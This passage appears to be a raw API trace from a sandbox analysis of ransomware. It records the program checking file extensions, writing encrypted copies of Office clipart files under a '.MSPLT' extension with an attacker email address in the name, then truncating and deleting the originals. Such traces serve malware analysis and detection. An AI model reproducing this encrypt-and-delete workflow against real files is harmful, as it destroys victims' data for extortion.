lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0303.526] lstrlenW (lpString=".xls") returned 4 [0303.526] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0303.526] lstrlenW (lpString=".xlsx") returned 5 [0303.526] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0303.526] lstrlenW (lpString=".ppt") returned 4 [0303.526] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0303.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0303.526] lstrlenW (lpString=".zip") returned 4 [0303.526] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0303.526] lstrlenW (lpString=".rar") returned 4 [0303.526] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0303.526] lstrlenW (lpString=".bz2") returned 4 [0303.526] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0303.526] lstrlenW (lpString=".7z") returned 3 [0303.526] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0303.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0303.526] lstrlenW (lpString=".dbf") returned 4 [0303.527] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0303.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0303.527] lstrlenW (lpString=".1cd") returned 4 [0303.527] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0303.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0303.527] lstrlenW (lpString=".jpg") returned 4 [0303.527] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0303.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0303.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0303.527] lstrlenW (lpString=".doc") returned 4 [0303.527] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0303.527] lstrlenW (lpString=".docx") returned 5 [0303.527] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0303.527] lstrlenW (lpString=".pdf") returned 4 [0303.528] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0303.528] lstrlenW (lpString=".xls") returned 4 [0303.528] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0303.528] lstrlenW (lpString=".xlsx") returned 5 [0303.528] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0303.528] lstrlenW (lpString=".ppt") returned 4 [0303.528] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0303.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0303.528] lstrlenW (lpString=".zip") returned 4 [0303.528] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0303.528] lstrlenW (lpString=".rar") returned 4 [0303.528] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0303.528] lstrlenW (lpString=".bz2") returned 4 [0303.528] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0303.528] lstrlenW (lpString=".7z") returned 3 [0303.528] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0303.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0303.528] lstrlenW (lpString=".dbf") returned 4 [0303.529] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0303.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0303.529] lstrlenW (lpString=".1cd") returned 4 [0303.529] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0303.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0303.529] lstrlenW (lpString=".jpg") returned 4 [0303.529] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0303.529] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0303.529] lstrlenW (lpString="BL00270_.WMF") returned 12 [0303.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e8 [0303.530] GetFileSizeEx (in: hFile=0x4e8, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=3016) returned 1 [0303.530] CloseHandle (hObject=0x4e8) returned 1 [0303.530] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf")) returned 0x220 [0303.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0303.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e8 [0303.531] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0303.531] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0303.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4ec [0303.532] GetLastError () returned 0x0 [0303.532] ReadFile (in: hFile=0x4e8, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0xbc8, lpOverlapped=0x0) returned 1 [0303.549] WriteFile (in: hFile=0x4ec, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xbd0, lpOverlapped=0x0) returned 1 [0303.550] ReadFile (in: hFile=0x4e8, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0303.550] WriteFile (in: hFile=0x4ec, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0303.551] SetEndOfFile (hFile=0x4ec) returned 1 [0303.551] CloseHandle (hObject=0x4ec) returned 1 [0303.556] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0303.556] SetEndOfFile (hFile=0x4e8) returned 1 [0303.815] CloseHandle (hObject=0x4e8) returned 1 [0303.815] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0304.026] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00270_.wmf")) returned 1 [0305.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0305.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0305.471] lstrlenW (lpString=".doc") returned 4 [0305.471] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0305.471] lstrlenW (lpString=".docx") returned 5 [0305.471] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0305.471] lstrlenW (lpString=".pdf") returned 4 [0305.471] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0305.471] lstrlenW (lpString=".xls") returned 4 [0305.471] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0305.471] lstrlenW (lpString=".xlsx") returned 5 [0305.471] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0305.471] lstrlenW (lpString=".ppt") returned 4 [0305.471] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0305.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0305.471] lstrlenW (lpString=".zip") returned 4 [0305.471] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0305.472] lstrlenW (lpString=".rar") returned 4 [0305.472] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0305.472] lstrlenW (lpString=".bz2") returned 4 [0305.472] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0305.472] lstrlenW (lpString=".7z") returned 3 [0305.472] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0305.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0305.472] lstrlenW (lpString=".dbf") returned 4 [0305.472] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0305.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0305.472] lstrlenW (lpString=".1cd") returned 4 [0305.472] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0305.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0305.472] lstrlenW (lpString=".jpg") returned 4 [0305.472] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0305.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0305.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0305.472] lstrlenW (lpString=".doc") returned 4 [0305.472] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0305.473] lstrlenW (lpString=".docx") returned 5 [0305.473] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0305.473] lstrlenW (lpString=".pdf") returned 4 [0305.473] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0305.473] lstrlenW (lpString=".xls") returned 4 [0305.473] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0305.473] lstrlenW (lpString=".xlsx") returned 5 [0305.473] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0305.473] lstrlenW (lpString=".ppt") returned 4 [0305.473] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0305.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0305.473] lstrlenW (lpString=".zip") returned 4 [0305.473] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0305.473] lstrlenW (lpString=".rar") returned 4 [0305.473] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0305.473] lstrlenW (lpString=".bz2") returned 4 [0305.473] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0305.473] lstrlenW (lpString=".7z") returned 3 [0305.473] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0305.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0305.473] lstrlenW (lpString=".dbf") returned 4 [0305.474] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0305.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0305.474] lstrlenW (lpString=".1cd") returned 4 [0305.474] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0305.474] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 68 [0305.474] lstrlenW (lpString=".jpg") returned 4 [0305.474] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0305.474] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0305.474] lstrlenW (lpString="BL00296_.WMF") returned 12 [0305.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0306.095] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=812) returned 1 [0306.095] CloseHandle (hObject=0x524) returned 1 [0306.095] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf")) returned 0x220 [0306.403] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0307.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0307.061] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0307.061] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0307.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0307.185] GetLastError () returned 0x0 [0307.185] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x32c, lpOverlapped=0x0) returned 1 [0307.188] WriteFile (in: hFile=0x540, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x330, lpOverlapped=0x0) returned 1 [0307.190] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0307.190] WriteFile (in: hFile=0x540, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0307.190] SetEndOfFile (hFile=0x540) returned 1 [0307.190] CloseHandle (hObject=0x540) returned 1 [0307.192] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0307.192] SetEndOfFile (hFile=0x3e4) returned 1 [0307.197] CloseHandle (hObject=0x3e4) returned 1 [0307.197] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0307.198] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf")) returned 1 [0307.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0307.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0307.202] lstrlenW (lpString=".doc") returned 4 [0307.202] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0307.202] lstrlenW (lpString=".docx") returned 5 [0307.202] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0307.202] lstrlenW (lpString=".pdf") returned 4 [0307.202] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0307.202] lstrlenW (lpString=".xls") returned 4 [0307.202] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0307.202] lstrlenW (lpString=".xlsx") returned 5 [0307.203] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0307.203] lstrlenW (lpString=".ppt") returned 4 [0307.203] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0307.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0307.203] lstrlenW (lpString=".zip") returned 4 [0307.203] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0307.203] lstrlenW (lpString=".rar") returned 4 [0307.203] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0307.203] lstrlenW (lpString=".bz2") returned 4 [0307.203] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0307.203] lstrlenW (lpString=".7z") returned 3 [0307.203] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0307.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0307.203] lstrlenW (lpString=".dbf") returned 4 [0307.203] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0307.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0307.203] lstrlenW (lpString=".1cd") returned 4 [0307.203] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0307.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0307.203] lstrlenW (lpString=".jpg") returned 4 [0307.204] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0307.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0307.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0307.204] lstrlenW (lpString=".doc") returned 4 [0307.204] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0307.204] lstrlenW (lpString=".docx") returned 5 [0307.204] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0307.204] lstrlenW (lpString=".pdf") returned 4 [0307.204] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0307.204] lstrlenW (lpString=".xls") returned 4 [0307.204] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0307.204] lstrlenW (lpString=".xlsx") returned 5 [0307.204] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0307.204] lstrlenW (lpString=".ppt") returned 4 [0307.204] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0307.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0307.204] lstrlenW (lpString=".zip") returned 4 [0307.204] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0307.204] lstrlenW (lpString=".rar") returned 4 [0307.205] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0307.205] lstrlenW (lpString=".bz2") returned 4 [0307.205] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0307.205] lstrlenW (lpString=".7z") returned 3 [0307.205] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0307.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0307.205] lstrlenW (lpString=".dbf") returned 4 [0307.205] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0307.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0307.205] lstrlenW (lpString=".1cd") returned 4 [0307.205] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0307.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 68 [0307.205] lstrlenW (lpString=".jpg") returned 4 [0307.205] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0307.206] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0307.206] lstrlenW (lpString="BL00648_.WMF") returned 12 [0307.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0307.207] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=11500) returned 1 [0307.207] CloseHandle (hObject=0x3e4) returned 1 [0307.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf")) returned 0x220 [0307.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0307.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0307.208] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0307.208] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0307.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0307.210] GetLastError () returned 0x0 [0307.211] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x2cec, lpOverlapped=0x0) returned 1 [0307.214] WriteFile (in: hFile=0x540, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x2cf0, lpOverlapped=0x0) returned 1 [0307.216] ReadFile (in: hFile=0x3e4, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0307.216] WriteFile (in: hFile=0x540, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0307.216] SetEndOfFile (hFile=0x540) returned 1 [0307.217] CloseHandle (hObject=0x540) returned 1 [0307.223] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0307.223] SetEndOfFile (hFile=0x3e4) returned 1 [0307.791] CloseHandle (hObject=0x3e4) returned 1 [0307.791] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0307.796] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf")) returned 1 [0307.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0307.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 68 [0307.797] lstrlenW (lpString=".doc") returned 4 [0307.797] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0307.797] lstrlenW (lpString=".docx") returned 5 [0307.797] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0307.797] lstrlenW (lpString=".pdf") returned 4 [0307.797] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0307.797] lstrlenW (lpString=".xls") returned 4 [0307.797] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0307.797] lstrlenW (lpString=".xlsx") returned 5 [0307.797] lstrcmpiW 